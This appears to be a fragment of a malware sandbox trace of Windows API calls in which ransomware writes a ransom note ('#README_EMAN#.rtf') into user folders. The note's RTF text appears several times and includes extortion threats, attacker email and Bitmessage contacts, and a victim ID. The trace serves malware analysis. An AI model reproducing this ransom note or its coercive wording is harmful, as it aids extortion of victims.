\\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.665] WriteFile (in: hFile=0x2ec, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.665] CloseHandle (hObject=0x2ec) returned 1 [0298.666] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\#readme_eman#.rtf")) returned 0x20 [0298.666] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\#readme_eman#.rtf")) returned 0xffffffff [0298.666] GetLastError () returned 0x2 [0298.666] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.667] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.667] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.667] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 